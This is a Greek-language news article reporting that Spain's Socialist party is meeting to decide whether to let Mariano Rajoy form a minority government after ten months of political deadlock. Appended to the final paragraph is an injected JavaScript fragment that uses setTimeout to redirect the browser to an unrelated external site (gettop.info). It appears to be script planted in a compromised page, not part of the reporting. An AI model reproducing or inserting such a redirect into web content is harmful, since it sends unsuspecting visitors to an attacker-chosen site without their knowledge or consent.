Οι Σοσιαλιστές αποφασίζουν αν ο Ραχόι θα σχηματίσει κυβέρνηση

0
7

 

Αν θα επιτρέψουν οι Σοσιαλιστές στους αντιπάλους τους του Λαϊκού Κόμματος να σχηματίσουν κυβέρνηση μειοψηφίας αποφασίζουν σήμερα, έπειτα από 10 μήνες πολιτικού αδιεξόδου.

Η ομοσπονδιακή επιτροπή του Σοσιαλιστικού Κόμματος της Ισπανίας (PSOE), που ορίζει τη γραμμή του κόμματος μεταξύ των συνεδρίων, συγκαλείται σήμερα στη Μαδρίτη έπειτα από εβδομάδες έντονων εσωτερικών αντιπαραθέσεων εξαιτίας των συνεχόμενων εκλογικών αποτυχιών του κόμματος και της αυξανόμενης απειλής που αποτελεί το αριστερό κόμμα Podemos, το οποίο εμφανίζεται αποφασισμένο να εκτοπίσει τους Σοσιαλιστές.

Οι εσωκομματικές διαφωνίες για τη στρατηγική που θα ακολουθήσουν οδήγησαν ακόμη και στην παραίτηση του γγ Πέδρο Σάντσες, ο οποίος αρνιόταν κατηγορηματικά να επιτρέψει στον αντίπαλό του Μαριάνο Ραχόι να παραμείνει στην εξουσία.

Οι σοσιαλιστές αντίπαλοι του Σάντσες προτιμούν να υπομείνουν την ήττα τους και να παραμείνουν στην αντιπολίτευση παρά να προκαλέσουν τρίτες εκλογές σε διάστημα ενός έτους.

Τώρα μένει να αποφασιστεί αν την ημέρα της ψήφου εμπιστοσύνης, στις 29 ή τις 30 Οκτωβρίου, οι βουλευτές των Σοσιαλιστών θα απέχουν μαζικά ή μόνο 11 εξ αυτών, ο ελάχιστος αριθμός που για να ανοίξει ο δρόμος στον Ραχόι και να αποκτήσει η Ισπανία κυβέρνηση έπειτα από 300 ημέρες. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here